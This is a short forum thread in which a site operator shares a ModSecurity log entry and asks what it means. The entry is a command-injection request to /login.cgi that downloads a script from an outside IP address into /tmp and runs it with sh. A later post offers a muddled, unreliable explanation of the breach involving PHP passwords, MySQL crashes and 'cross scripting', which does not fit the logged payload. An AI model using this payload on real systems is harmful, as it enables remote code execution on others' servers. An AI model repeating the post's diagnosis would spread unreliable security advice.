Hello everyone!! Anyone have any input on this sort of stuff? GET /login.cgi?cli=aa%20aa%27;wget%20http://185.62.190.191/r%20-O%20-%3E%20/tmp/r;sh%20/tmp/r%27$ I am seeing a lot of the his in my mod security.. Was wondering if anyone had any input?? I tried a google search but nothing is really coming up.. Suggestions on words to google? Thank you
I found it out. Turns out the php password wasn't protected... soo the hackers crashed the mysql connection and then the password would show. They would use the cross scripting to connect into mysql and go from there. One of the top security firms in the world couldn't figure this out. I did after so long... But lots and lots of time spent looking in the wrong areas...